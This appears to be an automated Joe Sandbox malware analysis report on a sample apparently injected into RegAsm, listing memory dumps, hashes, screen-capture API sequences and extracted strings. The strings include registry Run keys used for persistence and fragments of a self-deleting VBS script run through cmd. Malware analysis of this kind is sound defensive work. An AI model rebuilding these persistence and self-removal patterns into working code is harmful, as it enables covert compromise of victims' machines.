                                                                                                                                        • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.3 Pro), ref: 0040F920
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoLocale
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2299586839-0
                                                                                                                                        • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                                                                                        • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                                                                                                        • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                                                                                        • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: @
                                                                                                                                        • API String ID: 0-2766056989
                                                                                                                                        • Opcode ID: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                                                                                                                        • Instruction ID: bbd91956ea41f9089fdf4ea26de33e0e8d132f349ea16d9e77f48d305cf446da
                                                                                                                                        • Opcode Fuzzy Hash: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                                                                                                                        • Instruction Fuzzy Hash: F1412975A183558FC340CF29D58020AFBE1FFC8318F645A1EF889A3350D379E9428B86
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: f12bac2ceacaba3709f449de7301e54826307763cc64d35c491f096f7cc92462
                                                                                                                                        • Instruction ID: 44f99013a838546abf86f75096a930c39f9ce457c7277da91ad5f6740c4fb7fb
                                                                                                                                        • Opcode Fuzzy Hash: f12bac2ceacaba3709f449de7301e54826307763cc64d35c491f096f7cc92462
                                                                                                                                        • Instruction Fuzzy Hash: 89628C316083958FD324DF28C48469ABBF1FF85384F154A2DE9E98B391E771D989CB42
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: c092c4f6b84b18e3b6cbbf7fe4413e1147b07dd6558fe569cc2693f6d3c9d2d8
                                                                                                                                        • Instruction ID: 4200599dcb49c21c1ca78238ad82984ca11e49a574bdd01b256a4bdf4e559873
                                                                                                                                        • Opcode Fuzzy Hash: c092c4f6b84b18e3b6cbbf7fe4413e1147b07dd6558fe569cc2693f6d3c9d2d8
                                                                                                                                        • Instruction Fuzzy Hash: D2322521D69F414DE7239A35CC22336A24CBFB73C5F15D737E81AB5AAAEB29C4834105
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 11fe0a22ef666ee2c1bed35089f8503541a39c5702d52e9a7652229b453a748b
                                                                                                                                        • Instruction ID: 06c66d0f35fb266b7f69fbfce4f1f639eb17408d85dd7e5468211ecdc8378744
                                                                                                                                        • Opcode Fuzzy Hash: 11fe0a22ef666ee2c1bed35089f8503541a39c5702d52e9a7652229b453a748b
                                                                                                                                        • Instruction Fuzzy Hash: 7932C2716087459BC715DF28C4807ABB7E5BF84318F040A3EF89587392D779D98ACB8A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 069969c8f4566116342464d842351c7afe0a72e1e3c3dbe851ab1ff53bf1dd64
                                                                                                                                        • Instruction ID: b033fe34555866f616fd3cc64b543b740d9cc82fbf2d17309ab2a27531c6336b
                                                                                                                                        • Opcode Fuzzy Hash: 069969c8f4566116342464d842351c7afe0a72e1e3c3dbe851ab1ff53bf1dd64
                                                                                                                                        • Instruction Fuzzy Hash: 6C02CEB17046528BC358CF2EEC5053AB7E1AB8D311744863EE495C7781EB35FA22CB94
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 82c6eebf497a8783bea5e127f8a47c76021f3e74a05456d4a9fdc662aa60ff2a
                                                                                                                                        • Instruction ID: 06b531cc06dcd57701b547059d2c567c45bbe225ee7d26ac7aed84b394be02a5
                                                                                                                                        • Opcode Fuzzy Hash: 82c6eebf497a8783bea5e127f8a47c76021f3e74a05456d4a9fdc662aa60ff2a
                                                                                                                                        • Instruction Fuzzy Hash: 2DF19D716142558FC348CF1DE8A187BB3E1FB89311B450A2EF582C3391DB79EA16CB56
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                                        • Instruction ID: 2ce137016e68017aebaac4bbf916a57dff7c64f07ba89619fc9d118b501662d8
                                                                                                                                        • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                                        • Instruction Fuzzy Hash: F9C1D5B22091930AEF3D4639853063FFAA05E957B171A635FE4F2CB2D4FE18C924D514
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                                        • Instruction ID: bc2d6065b6eca92eb436045fb502f22698d18e4b36ed1375ff5d5b4a3f5914d0
                                                                                                                                        • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                                        • Instruction Fuzzy Hash: 75C1D7722091930AEF2D4739853463FFAA15EA57B171A236FE4F2CB2D4FE28C924D514
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                                        • Instruction ID: 708e8454946620f186a1700387687a053fc407bd339bf74556c1f47a113f5a1a
                                                                                                                                        • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                                        • Instruction Fuzzy Hash: 95C1C3B220D0930AEF3D4639853063FFAA15EA67B171A675ED4F2CB2D4FE18C924D614
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                        • Instruction ID: 79ee4f31eba35b7567f7a499d226924a3a6c1d38d98321864059dc3c63d33f3d
                                                                                                                                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                        • Instruction Fuzzy Hash: 76C1E6B220D0930AEF3D4639853463FBAA15EA57B171A236FD4F2CB2D4FE18C924C614
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 2e85d6dc501202f3c2e801dccf0940871ddf0a86c450432c97aa3465398b7722
                                                                                                                                        • Instruction ID: 096ff1c695f9ab27d4b2dbab46670c8098de74970727e2ec16deab2a6828ec1d
                                                                                                                                        • Opcode Fuzzy Hash: 2e85d6dc501202f3c2e801dccf0940871ddf0a86c450432c97aa3465398b7722
                                                                                                                                        • Instruction Fuzzy Hash: EAB1A37951429A8ACB05EF68C4913F63BA1EF6A301F0850B9EC9CCF757D2398506EB24
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 30caec0efc745099040319085d406cd9bdcff08e218f1b0552064e12ef4373be
                                                                                                                                        • Instruction ID: 32d6082e35155a0a096806a6943d6f48c3d67459c64856e3d931f7c23e0710f9
                                                                                                                                        • Opcode Fuzzy Hash: 30caec0efc745099040319085d406cd9bdcff08e218f1b0552064e12ef4373be
                                                                                                                                        • Instruction Fuzzy Hash: 59618971202709A6EE34892B88967BF63949F6D314F10342FE983DB3C1D65DDD82931E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 341ce5e44018b0d8febb5363e57dd776d1ec6df4a054cddc6676df713c6a7dda
                                                                                                                                        • Instruction ID: 5d22fc1bcc5d638cf6a4a0606be4d5c4d5bba199c703cf788a7f99cafe8d65e8
                                                                                                                                        • Opcode Fuzzy Hash: 341ce5e44018b0d8febb5363e57dd776d1ec6df4a054cddc6676df713c6a7dda
                                                                                                                                        • Instruction Fuzzy Hash: 12615871602718A6DA38592B88977BF2384EB2D344F94351BE483DB3C1D75EAD43871E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                                                                                        • Instruction ID: 6c705508b021f12d90b9f9697341ee8142861c1d23b7247138392dbd6e0aa073
                                                                                                                                        • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                                                                                        • Instruction Fuzzy Hash: 59517671603604A7EF3445AB85567BF63899B0E304F18395FE882C73C2C52DDE02875E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                                                                                        • Instruction ID: 84bf5d8b6cf777f915eff3509e2c27b9c7ae744ab127a35c194aadb47efed811
                                                                                                                                        • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                                                                                        • Instruction Fuzzy Hash: E1517761E0660557DF38892A94D67BF23A59B4E308F18351FE483CB3C2C65EEE06835E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 5391bdb46e7b363b15ab8dfbfe7515acbec1a5683836347dd09947684361f79a
                                                                                                                                        • Instruction ID: d4d389248adab082d17fbdeb677dfbf93ddf16fcbb8c162b69e64d6cf0e33668
                                                                                                                                        • Opcode Fuzzy Hash: 5391bdb46e7b363b15ab8dfbfe7515acbec1a5683836347dd09947684361f79a
                                                                                                                                        • Instruction Fuzzy Hash: 61615B72A083059BC308DF35E481A5FB7E4AFCC718F814E2EF595D6151EA74EA08CB86
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                        • Instruction ID: 582e3a7babb983407823034c482dc4f24404013c153b7f4d28c3fef3b0c68a44
                                                                                                                                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                        • Instruction Fuzzy Hash: 43113B7720034183D60CAA6DC4B45BBD795EADE320FBD627FF0414B744CA2AD4459508
                                                                                                                                        APIs
                                                                                                                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                                                                                                                          • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00418F65
                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00418F68
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00418F6B
                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00418F9D
                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00418FA0
                                                                                                                                        • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                                                                                                                        • GetCursorInfo.USER32(?), ref: 00418FE2
                                                                                                                                        • GetIconInfo.USER32 ref: 00418FF8
                                                                                                                                        • DeleteObject.GDI32(?), ref: 00419027
                                                                                                                                        • DeleteObject.GDI32(?), ref: 00419034
                                                                                                                                        • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                                                                                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                                                                                                                                        • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                                                                                                                        • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                                                                                                                        • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                                                                                                                        • DeleteDC.GDI32(?), ref: 004191B7
                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 004191BA
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 004191BD
                                                                                                                                        • GlobalFree.KERNEL32(?), ref: 004191C8
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 0041927C
                                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00419283
                                                                                                                                        • DeleteDC.GDI32(?), ref: 00419293
                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 0041929E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                                                                                                                        • String ID: DISPLAY
                                                                                                                                        • API String ID: 4256916514-865373369
                                                                                                                                        • Opcode ID: dfe77fb2dceb0fbb205aabf54f767b908c25502d30906bbb63463b6629d02dd1
                                                                                                                                        • Instruction ID: e1b8f987aa81746083de8242de432fb1856ba331ec6d7e725e66c1191a76d441
                                                                                                                                        • Opcode Fuzzy Hash: dfe77fb2dceb0fbb205aabf54f767b908c25502d30906bbb63463b6629d02dd1
                                                                                                                                        • Instruction Fuzzy Hash: 64C14C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                                                          • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                                                                                                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                                                                                                                          • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,@0O,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                                                                                          • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                                                                                                                                          • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                                                                          • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                                                                                                                        • ExitProcess.KERNEL32 ref: 0040D80B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                                        • String ID: """, 0$")$8SG$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                                                                        • API String ID: 1861856835-1447701601
                                                                                                                                        • Opcode ID: d8e98d1fd2f1bdc760dae9a559abea4cd274c949fa03be3778951f2c3f1c4be1
                                                                                                                                        • Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
                                                                                                                                        • Opcode Fuzzy Hash: d8e98d1fd2f1bdc760dae9a559abea4cd274c949fa03be3778951f2c3f1c4be1
                                                                                                                                        • Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                                                          • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                                                                                                                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                                                                                                                                          • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,@0O,004752F0,?,pth_unenc), ref: 0040B8F6
